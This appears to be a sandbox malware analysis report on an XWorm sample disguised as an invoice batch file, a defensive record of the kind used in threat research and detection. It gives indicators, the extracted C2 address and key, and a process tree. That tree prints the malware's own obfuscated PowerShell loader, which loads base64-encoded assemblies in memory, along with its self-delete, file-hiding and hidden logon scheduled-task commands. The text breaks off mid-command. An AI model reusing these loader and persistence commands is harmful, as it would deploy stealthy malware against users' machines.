Resubmissions
09/04/2024, 17:39
240409-v8jxlahb3v 1025/03/2024, 14:18
240325-rmr5asae55 1020/03/2024, 19:31
240320-x8t4nsgg65 1020/03/2024, 18:56
240320-xlp67sga73 1018/03/2024, 12:37
240318-pt1c5she4x 10Analysis
-
max time kernel
1396s -
max time network
1392s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
25/03/2024, 14:18
Static task
static1
General
-
Target
INVOICE-02417869_77319135.bat
-
Size
304KB
-
MD5
6d6b6c679309bd938dbcaada6f7820dd
-
SHA1
ccb02a27885c656c2c52dc94272b91d46c46ac7c
-
SHA256
e1e32a7e5096ea1ad664b321e1bd1603761e28e3b63025fa02078361545894fd
-
SHA512
7c2317cf54a96bde7d0cb3d1ed9afdc91e1d35835bcdcab24b56d8bd3c8c3a8320c97c90267a2171d72919c9b6a89e845582f66e76e3354c23f79f5560645032
-
SSDEEP
1536:eN2lxmAHlCvI8H41j/KnDTBpRcuNoCSsXDht/lFqz5FWJYDzqGHRBWZbgbLxihFZ:eN2lZhSIj/crDhFrq9FFDnl3AIdWOC
Malware Config
Extracted
xworm
5.0
38.146.219.228:7000
4l7KI6LtRV2tYmxG
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/memory/2696-77-0x0000022120D10000-0x0000022120D1E000-memory.dmp family_xworm behavioral1/memory/1676-100-0x0000018AA1130000-0x0000018AA1140000-memory.dmp family_xworm -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation INVOICE-02417869_77319135.bat.exe Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation startup_str_45.bat.exe -
Executes dropped EXE 3 IoCs
pid Process 3404 INVOICE-02417869_77319135.bat.exe 2696 startup_str_45.bat.exe 2180 test.bat.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\eventvwr.msc mmc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Modifies registry class 55 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "3" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 firefox.exe Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" firefox.exe Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 firefox.exe Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell firefox.exe Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" firefox.exe Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" firefox.exe Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000 firefox.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ firefox.exe Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" firefox.exe Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings INVOICE-02417869_77319135.bat.exe Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0 firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff firefox.exe Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ firefox.exe Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg firefox.exe Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic" firefox.exe Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 firefox.exe Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell firefox.exe Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" firefox.exe Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 firefox.exe Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" firefox.exe Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" firefox.exe Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff firefox.exe Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0000000001000000ffffffff firefox.exe Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell firefox.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 2052 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 21 IoCs
pid Process 3404 INVOICE-02417869_77319135.bat.exe 3404 INVOICE-02417869_77319135.bat.exe 1984 powershell.exe 3236 powershell.exe 3236 powershell.exe 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe 2696 startup_str_45.bat.exe 2696 startup_str_45.bat.exe 2696 startup_str_45.bat.exe 1676 powershell.exe 1676 powershell.exe 1676 powershell.exe 1676 powershell.exe 1676 powershell.exe 4996 powershell.exe 4996 powershell.exe 4996 powershell.exe 2180 test.bat.exe 2180 test.bat.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1192 mmc.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3404 INVOICE-02417869_77319135.bat.exe Token: SeDebugPrivilege 3236 powershell.exe Token: SeDebugPrivilege 1984 powershell.exe Token: SeIncreaseQuotaPrivilege 3236 powershell.exe Token: SeSecurityPrivilege 3236 powershell.exe Token: SeTakeOwnershipPrivilege 3236 powershell.exe Token: SeLoadDriverPrivilege 3236 powershell.exe Token: SeSystemProfilePrivilege 3236 powershell.exe Token: SeSystemtimePrivilege 3236 powershell.exe Token: SeProfSingleProcessPrivilege 3236 powershell.exe Token: SeIncBasePriorityPrivilege 3236 powershell.exe Token: SeCreatePagefilePrivilege 3236 powershell.exe Token: SeBackupPrivilege 3236 powershell.exe Token: SeRestorePrivilege 3236 powershell.exe Token: SeShutdownPrivilege 3236 powershell.exe Token: SeDebugPrivilege 3236 powershell.exe Token: SeSystemEnvironmentPrivilege 3236 powershell.exe Token: SeRemoteShutdownPrivilege 3236 powershell.exe Token: SeUndockPrivilege 3236 powershell.exe Token: SeManageVolumePrivilege 3236 powershell.exe Token: 33 3236 powershell.exe Token: 34 3236 powershell.exe Token: 35 3236 powershell.exe Token: 36 3236 powershell.exe Token: SeIncreaseQuotaPrivilege 3236 powershell.exe Token: SeSecurityPrivilege 3236 powershell.exe Token: SeTakeOwnershipPrivilege 3236 powershell.exe Token: SeLoadDriverPrivilege 3236 powershell.exe Token: SeSystemProfilePrivilege 3236 powershell.exe Token: SeSystemtimePrivilege 3236 powershell.exe Token: SeProfSingleProcessPrivilege 3236 powershell.exe Token: SeIncBasePriorityPrivilege 3236 powershell.exe Token: SeCreatePagefilePrivilege 3236 powershell.exe Token: SeBackupPrivilege 3236 powershell.exe Token: SeRestorePrivilege 3236 powershell.exe Token: SeShutdownPrivilege 3236 powershell.exe Token: SeDebugPrivilege 3236 powershell.exe Token: SeSystemEnvironmentPrivilege 3236 powershell.exe Token: SeRemoteShutdownPrivilege 3236 powershell.exe Token: SeUndockPrivilege 3236 powershell.exe Token: SeManageVolumePrivilege 3236 powershell.exe Token: 33 3236 powershell.exe Token: 34 3236 powershell.exe Token: 35 3236 powershell.exe Token: 36 3236 powershell.exe Token: SeIncreaseQuotaPrivilege 3236 powershell.exe Token: SeSecurityPrivilege 3236 powershell.exe Token: SeTakeOwnershipPrivilege 3236 powershell.exe Token: SeLoadDriverPrivilege 3236 powershell.exe Token: SeSystemProfilePrivilege 3236 powershell.exe Token: SeSystemtimePrivilege 3236 powershell.exe Token: SeProfSingleProcessPrivilege 3236 powershell.exe Token: SeIncBasePriorityPrivilege 3236 powershell.exe Token: SeCreatePagefilePrivilege 3236 powershell.exe Token: SeBackupPrivilege 3236 powershell.exe Token: SeRestorePrivilege 3236 powershell.exe Token: SeShutdownPrivilege 3236 powershell.exe Token: SeDebugPrivilege 3236 powershell.exe Token: SeSystemEnvironmentPrivilege 3236 powershell.exe Token: SeRemoteShutdownPrivilege 3236 powershell.exe Token: SeUndockPrivilege 3236 powershell.exe Token: SeManageVolumePrivilege 3236 powershell.exe Token: 33 3236 powershell.exe Token: 34 3236 powershell.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 1192 mmc.exe 2228 firefox.exe 2228 firefox.exe 2228 firefox.exe 2228 firefox.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2228 firefox.exe 2228 firefox.exe 2228 firefox.exe -
Suspicious use of SetWindowsHookEx 26 IoCs
pid Process 1192 mmc.exe 1192 mmc.exe 1192 mmc.exe 1192 mmc.exe 1192 mmc.exe 1192 mmc.exe 1192 mmc.exe 1192 mmc.exe 1192 mmc.exe 1192 mmc.exe 1192 mmc.exe 1192 mmc.exe 1192 mmc.exe 1192 mmc.exe 1192 mmc.exe 1192 mmc.exe 1192 mmc.exe 1192 mmc.exe 1192 mmc.exe 1192 mmc.exe 1192 mmc.exe 1192 mmc.exe 1192 mmc.exe 2228 firefox.exe 2228 firefox.exe 2228 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3612 wrote to memory of 3404 3612 cmd.exe 92 PID 3612 wrote to memory of 3404 3612 cmd.exe 92 PID 3404 wrote to memory of 1984 3404 INVOICE-02417869_77319135.bat.exe 93 PID 3404 wrote to memory of 1984 3404 INVOICE-02417869_77319135.bat.exe 93 PID 3404 wrote to memory of 2972 3404 INVOICE-02417869_77319135.bat.exe 94 PID 3404 wrote to memory of 2972 3404 INVOICE-02417869_77319135.bat.exe 94 PID 3404 wrote to memory of 3236 3404 INVOICE-02417869_77319135.bat.exe 96 PID 3404 wrote to memory of 3236 3404 INVOICE-02417869_77319135.bat.exe 96 PID 2972 wrote to memory of 972 2972 cmd.exe 99 PID 2972 wrote to memory of 972 2972 cmd.exe 99 PID 3404 wrote to memory of 4988 3404 INVOICE-02417869_77319135.bat.exe 105 PID 3404 wrote to memory of 4988 3404 INVOICE-02417869_77319135.bat.exe 105 PID 4988 wrote to memory of 1980 4988 WScript.exe 106 PID 4988 wrote to memory of 1980 4988 WScript.exe 106 PID 1980 wrote to memory of 2696 1980 cmd.exe 108 PID 1980 wrote to memory of 2696 1980 cmd.exe 108 PID 2696 wrote to memory of 1676 2696 startup_str_45.bat.exe 109 PID 2696 wrote to memory of 1676 2696 startup_str_45.bat.exe 109 PID 2696 wrote to memory of 4640 2696 startup_str_45.bat.exe 111 PID 2696 wrote to memory of 4640 2696 startup_str_45.bat.exe 111 PID 4640 wrote to memory of 2244 4640 cmd.exe 113 PID 4640 wrote to memory of 2244 4640 cmd.exe 113 PID 4912 wrote to memory of 2180 4912 cmd.exe 167 PID 4912 wrote to memory of 2180 4912 cmd.exe 167 PID 968 wrote to memory of 2228 968 firefox.exe 170 PID 968 wrote to memory of 2228 968 firefox.exe 170 PID 968 wrote to memory of 2228 968 firefox.exe 170 PID 968 wrote to memory of 2228 968 firefox.exe 170 PID 968 wrote to memory of 2228 968 firefox.exe 170 PID 968 wrote to memory of 2228 968 firefox.exe 170 PID 968 wrote to memory of 2228 968 firefox.exe 170 PID 968 wrote to memory of 2228 968 firefox.exe 170 PID 968 wrote to memory of 2228 968 firefox.exe 170 PID 968 wrote to memory of 2228 968 firefox.exe 170 PID 968 wrote to memory of 2228 968 firefox.exe 170 PID 2228 wrote to memory of 3276 2228 firefox.exe 171 PID 2228 wrote to memory of 3276 2228 firefox.exe 171 PID 2228 wrote to memory of 1252 2228 firefox.exe 172 PID 2228 wrote to memory of 1252 2228 firefox.exe 172 PID 2228 wrote to memory of 1252 2228 firefox.exe 172 PID 2228 wrote to memory of 1252 2228 firefox.exe 172 PID 2228 wrote to memory of 1252 2228 firefox.exe 172 PID 2228 wrote to memory of 1252 2228 firefox.exe 172 PID 2228 wrote to memory of 1252 2228 firefox.exe 172 PID 2228 wrote to memory of 1252 2228 firefox.exe 172 PID 2228 wrote to memory of 1252 2228 firefox.exe 172 PID 2228 wrote to memory of 1252 2228 firefox.exe 172 PID 2228 wrote to memory of 1252 2228 firefox.exe 172 PID 2228 wrote to memory of 1252 2228 firefox.exe 172 PID 2228 wrote to memory of 1252 2228 firefox.exe 172 PID 2228 wrote to memory of 1252 2228 firefox.exe 172 PID 2228 wrote to memory of 1252 2228 firefox.exe 172 PID 2228 wrote to memory of 1252 2228 firefox.exe 172 PID 2228 wrote to memory of 1252 2228 firefox.exe 172 PID 2228 wrote to memory of 1252 2228 firefox.exe 172 PID 2228 wrote to memory of 1252 2228 firefox.exe 172 PID 2228 wrote to memory of 1252 2228 firefox.exe 172 PID 2228 wrote to memory of 1252 2228 firefox.exe 172 PID 2228 wrote to memory of 1252 2228 firefox.exe 172 PID 2228 wrote to memory of 1252 2228 firefox.exe 172 PID 2228 wrote to memory of 1252 2228 firefox.exe 172 PID 2228 wrote to memory of 1252 2228 firefox.exe 172 PID 2228 wrote to memory of 1252 2228 firefox.exe 172 PID 2228 wrote to memory of 1252 2228 firefox.exe 172 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 972 attrib.exe 2244 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\INVOICE-02417869_77319135.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3612 -
C:\Users\Admin\AppData\Local\Temp\INVOICE-02417869_77319135.bat.exe"C:\Users\Admin\AppData\Local\Temp\INVOICE-02417869_77319135.bat.exe" -noprofile -w hidden -ep bypass -command $h1dden_6PX4R4EI97 = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\INVOICE-02417869_77319135.bat').Split([Environment]::NewLine); foreach ($h1dden_5CTWVIXP39 in $h1dden_6PX4R4EI97) { $h1dden_GWJZ79AQLX = [System.Text.RegularExpressions.Regex]::Replace('_0', '0', ' '); $h1dden_GWJZ79AQLX = [System.Text.RegularExpressions.Regex]::Replace($h1dden_GWJZ79AQLX, '_', 'NC9JF6XBBE9W'); if ($h1dden_5CTWVIXP39 -match $h1dden_GWJZ79AQLX) { $h1dden_9ETDMIF4K6 = [System.Text.RegularExpressions.Regex]::Replace($h1dden_5CTWVIXP39, 'NC9JF6XBBE9W', ''); $h1dden_9ETDMIF4K6 = [System.Text.RegularExpressions.Regex]::Replace($h1dden_9ETDMIF4K6, '#', '/'); $h1dden_9ETDMIF4K6 = [System.Text.RegularExpressions.Regex]::Replace($h1dden_9ETDMIF4K6, '@', 'A');break; }; }; if ($h1dden_9ETDMIF4K6.Contains('GHQGYADXBYSPMVIMBZELCEYKCDTGAZ')) { $h1dden_9ETDMIF4K6 = [System.Text.RegularExpressions.Regex]::Replace($h1dden_9ETDMIF4K6, 'GHQGYADXBYSPMVIMBZELCEYKCDTGAZ', ''); } else { exit }; $h1dden_6H4D035AJI = [string[]]$h1dden_9ETDMIF4K6.Split('!'); $h1dden_8BPQJS0IX6 = [System.Convert]::FromBase64String($h1dden_6H4D035AJI[0]); $h1dden_GZP997YC33 = [System.Reflection.Assembly]::Load($h1dden_8BPQJS0IX6); $h1dden_SU6ND0HM0P = $h1dden_GZP997YC33.EntryPoint; $h1dden_SU6ND0HM0P.Invoke($null, $null); $h1dden_D2APD5ZCTP = [System.Convert]::FromBase64String($h1dden_6H4D035AJI[1]); $h1dden_R7HO2DCETZ = [System.Reflection.Assembly]::Load($h1dden_D2APD5ZCTP); $h1dden_XZ8OZOMAPF = $h1dden_R7HO2DCETZ.EntryPoint; $h1dden_XZ8OZOMAPF.Invoke($null, $null)2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3404 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(3404);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ATTRIB +H "C:\Users\Admin\AppData\Local\Temp\INVOICE-02417869_77319135.bat.exe" & exit3⤵
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\system32\attrib.exeATTRIB +H "C:\Users\Admin\AppData\Local\Temp\INVOICE-02417869_77319135.bat.exe"4⤵
- Views/modifies file attributes
PID:972
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_45_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_45.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3236
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_45.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4988 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_45.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Users\Admin\AppData\Roaming\startup_str_45.bat.exe"C:\Users\Admin\AppData\Roaming\startup_str_45.bat.exe" -noprofile -w hidden -ep bypass -command $h1dden_6PX4R4EI97 = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Roaming\startup_str_45.bat').Split([Environment]::NewLine); foreach ($h1dden_5CTWVIXP39 in $h1dden_6PX4R4EI97) { $h1dden_GWJZ79AQLX = [System.Text.RegularExpressions.Regex]::Replace('_0', '0', ' '); $h1dden_GWJZ79AQLX = [System.Text.RegularExpressions.Regex]::Replace($h1dden_GWJZ79AQLX, '_', 'NC9JF6XBBE9W'); if ($h1dden_5CTWVIXP39 -match $h1dden_GWJZ79AQLX) { $h1dden_9ETDMIF4K6 = [System.Text.RegularExpressions.Regex]::Replace($h1dden_5CTWVIXP39, 'NC9JF6XBBE9W', ''); $h1dden_9ETDMIF4K6 = [System.Text.RegularExpressions.Regex]::Replace($h1dden_9ETDMIF4K6, '#', '/'); $h1dden_9ETDMIF4K6 = [System.Text.RegularExpressions.Regex]::Replace($h1dden_9ETDMIF4K6, '@', 'A');break; }; }; if ($h1dden_9ETDMIF4K6.Contains('GHQGYADXBYSPMVIMBZELCEYKCDTGAZ')) { 